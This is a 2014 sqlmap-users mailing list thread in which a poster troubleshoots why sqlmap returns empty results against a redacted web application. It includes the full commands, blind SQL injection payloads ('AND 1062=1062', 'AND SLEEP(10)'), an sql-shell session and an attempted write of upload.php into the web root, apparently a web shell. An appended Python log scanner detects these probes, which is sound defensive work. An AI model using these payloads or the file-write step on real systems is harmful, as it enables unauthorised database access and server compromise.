Re: [sqlmap-users] executing query with NONE result
From: Miroslav S. <mir...@gm...> - 2014-01-22 20:19:57
Hi. Have you considered that it might be behind some WAF?

Bye

On Jan 22, 2014 6:28 AM, "Alok Kumar" <myp...@gm...> wrote:
> Hello members, need your help to solve this mystery.
> My manual assessment against a web application revealed the possibility of
> an SQL injection vulnerability, which has been reconfirmed using the Netsparker
> automated web application assessment tool.
>
> I then used sqlmap to exploit the SQL injection flaw to do something
> interesting, but none of it worked for me; sqlmap even says the parameter
> is injectable, and in fact it actually exploited the issue, but unfortunately
> with ZERO results.
>
> I tried almost everything from "--current-db, --dbs, --banner", and
> everything was found to execute with a result value of NONE.
>
> I even tried --sql-shell, which gave me an sql-shell> prompt, but whatever
> query I tried gave ZERO result without any error. I did try some
> custom queries, but they didn't work because of the stacked query limitation.
>
> I'm positively sure that the target parameter is injectable but couldn't make
> out why it is not executing and/or giving any response to my query.
>
> Please help me with this. Thanks in advance!
>
> I have also posted two of the queries which I executed for your reference.
>
>
> SQLMap query output
> **************************************************************
> First query
> **************************************************************
>
> root@bt:/pentest/database/sqlmap# ./sqlmap.py -u http://www.xxxxxx.com/xxx10.php?cid=1111111 --current-db --no-cast --time-sec=10 -t xxix-output
>
> sqlmap/1.0-dev-7ba9e75 - automatic SQL injection and database takeover tool
> http://sqlmap.org
>
> [!] legal disclaimer: Usage of sqlmap for attacking targets without prior
> mutual consent is illegal. It is the end user's responsibility to obey all
> applicable local, state and federal laws. Developers assume no liability
> and are not responsible for any misuse or damage caused by this program
>
> [*] starting at 18:54:00
>
> [18:54:00] [INFO] setting file for logging HTTP traffic
> [18:54:00] [INFO] resuming back-end DBMS 'mysql'
> [18:54:00] [INFO] testing connection to the target URL
> [18:54:00] [INFO] heuristics detected web page charset 'ISO-8859-2'
> sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
> ---
> Place: GET
> Parameter: cid
>     Type: boolean-based blind
>     Title: AND boolean-based blind - WHERE or HAVING clause
>     Payload: cid=1111111 AND 1062=1062
>
>     Type: AND/OR time-based blind
>     Title: MySQL > 5.0.11 AND time-based blind
>     Payload: cid=1111111 AND SLEEP(10)
> ---
> [18:54:00] [INFO] the back-end DBMS is MySQL
> web server operating system: Linux Ubuntu
> web application technology: Nginx, PHP 5.3.10
> back-end DBMS: MySQL 5.0.11
> [18:54:00] [INFO] fetching current database
> [18:54:00] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
> [18:54:00] [INFO] retrieved:
> [18:54:01] [INFO] heuristics detected web page charset 'ascii'
>
> [18:54:01] [WARNING] time-based comparison needs larger statistical model. Making a few dummy requests, please wait..
> [18:54:07] [WARNING] it is very important not to stress the network adapter's bandwidth during usage of time-based payloads
>
> [18:54:08] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'
> current database: None
> [18:54:08] [INFO] fetched data logged to text files under '/pentest/database/sqlmap/output/www.xxxxxx.com'
>
> [*] shutting down at 18:54:08
>
>
> **************************************************************
> Second query
> **************************************************************
> root@bt:/pentest/database/sqlmap# ./sqlmap.py -u http://www.xxxxxx.com/xxx10.php?cid=1111111 --time-sec=10 --sql-shell
>
> sqlmap/1.0-dev-7ba9e75 - automatic SQL injection and database takeover tool
> http://sqlmap.org
>
> [!] legal disclaimer: Usage of sqlmap for attacking targets without prior
> mutual consent is illegal. It is the end user's responsibility to obey all
> applicable local, state and federal laws. Developers assume no liability
> and are not responsible for any misuse or damage caused by this program
>
> [*] starting at 18:18:17
>
> [18:18:17] [INFO] resuming back-end DBMS 'mysql'
> [18:18:17] [INFO] testing connection to the target URL
> [18:18:18] [INFO] heuristics detected web page charset 'ISO-8859-2'
> sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
> ---
> Place: GET
> Parameter: cid
>     Type: boolean-based blind
>     Title: AND boolean-based blind - WHERE or HAVING clause
>     Payload: cid=1111111 AND 1062=1062
>
>     Type: AND/OR time-based blind
>     Title: MySQL > 5.0.11 AND time-based blind
>     Payload: cid=1111111 AND SLEEP(10)
> ---
> [18:18:18] [INFO] the back-end DBMS is MySQL
> web server operating system: Linux Ubuntu
> web application technology: Nginx, PHP 5.3.10
> back-end DBMS: MySQL 5.0.11
> [18:18:18] [INFO] calling MySQL shell. To quit type 'x' or 'q' and press ENTER
> sql-shell> user()
> [18:18:25] [INFO] fetching SQL query output: 'user()'
> [18:18:25] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
> [18:18:25] [INFO] retrieved:
> [18:18:25] [INFO] heuristics detected web page charset 'ascii'
>
> [18:18:26] [WARNING] time-based comparison needs larger statistical model. Making a few dummy requests, please wait..
> [18:18:32] [WARNING] it is very important not to stress the network adapter's bandwidth during usage of time-based payloads
>
> [18:18:33] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'
> sql-shell> user() --hex
> [18:18:59] [INFO] fetching SQL query output: 'user() --hex'
> [18:18:59] [INFO] retrieved:
> [18:19:00] [INFO] retrieved:
> sql-shell> select [...] into "/var/www/xxxxxx.com/upload.php"; --hex
> [18:19:16] [WARNING] execution of custom SQL queries is only available when stacked queries are supported
> sql-shell> db_name --hex
> [18:19:29] [INFO] fetching SQL query output: 'db_name --hex'
> [18:19:29] [INFO] retrieved:
> [18:19:29] [INFO] retrieved:
> sql-shell> x
> [18:19:39] [INFO] fetched data logged to text files under '/pentest/database/sqlmap/output/www.xxxxxx.com'
>
> [*] shutting down at 18:19:39
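The two payload shapes sqlmap reports in the thread (`AND 1062=1062` for boolean-based blind and `AND SLEEP(10)` for time-based blind) are exactly what an operator of the Nginx server above would look for in its access log. The following is an added example, not code from the thread or from sqlmap: it flags those probes in constructed combined-format log lines and groups them by client IP, since blind extraction needs many requests per character. The log lines, IPs and user-agent strings are constructed sample data.

```python
import re
from collections import Counter
from urllib.parse import urlsplit, parse_qsl

# Constructed nginx combined-format log lines (sample data, not the poster's traffic);
# lines 2 and 3 carry the two payload shapes sqlmap reported, URL-encoded as sent.
SAMPLE_LOG = """\
203.0.113.5 - - [22/Jan/2014:18:54:00 +0000] "GET /xxx10.php?cid=1111111 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.5 - - [22/Jan/2014:18:54:00 +0000] "GET /xxx10.php?cid=1111111%20AND%201062%3D1062 HTTP/1.1" 200 5120 "-" "sqlmap/1.0-dev"
203.0.113.5 - - [22/Jan/2014:18:54:01 +0000] "GET /xxx10.php?cid=1111111%20AND%20SLEEP%2810%29 HTTP/1.1" 200 5120 "-" "sqlmap/1.0-dev"
198.51.100.7 - - [22/Jan/2014:18:55:10 +0000] "GET /xxx10.php?cid=42 HTTP/1.1" 200 4096 "-" "Mozilla/5.0"
"""

# ip ident user [time] "METHOD target PROTO" status bytes "referer" "agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"'
)
# Boolean-based blind probe: "AND 1062=1062" tautology (same number on both sides).
BOOLEAN_RE = re.compile(r"\b(and|or)\s+(\d+)\s*=\s*\2\b", re.I)
# Time-based blind probe: MySQL SLEEP()/BENCHMARK() in a parameter value.
TIME_RE = re.compile(r"\b(sleep|benchmark)\s*\(", re.I)

def classify_query(target):
    """Return (param, technique) pairs for query parameters carrying a blind-SQLi probe."""
    hits = []
    # parse_qsl percent-decodes values, so the patterns run against the decoded payload.
    for name, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
        if TIME_RE.search(value):
            hits.append((name, "time-based"))
        elif BOOLEAN_RE.search(value):
            hits.append((name, "boolean-based"))
    return hits

def scan_log(text):
    """Parse each combined-format line and emit one finding per flagged parameter."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that are not in combined format
        for param, technique in classify_query(m.group("target")):
            findings.append({"ip": m.group("ip"), "param": param, "technique": technique,
                             "tool_ua": "sqlmap" in m.group("ua").lower()})
    return findings

def suspicious_sources(findings, threshold=2):
    """Client IPs with at least `threshold` probes; blind extraction needs many requests."""
    counts = Counter(f["ip"] for f in findings)
    return sorted(ip for ip, n in counts.items() if n >= threshold)
```

A WAF or rate limiter sitting in front of the application, as suggested in the reply, would show up here as probes that are logged by the edge but never reach the backend, or as a run of non-200 statuses for the same source.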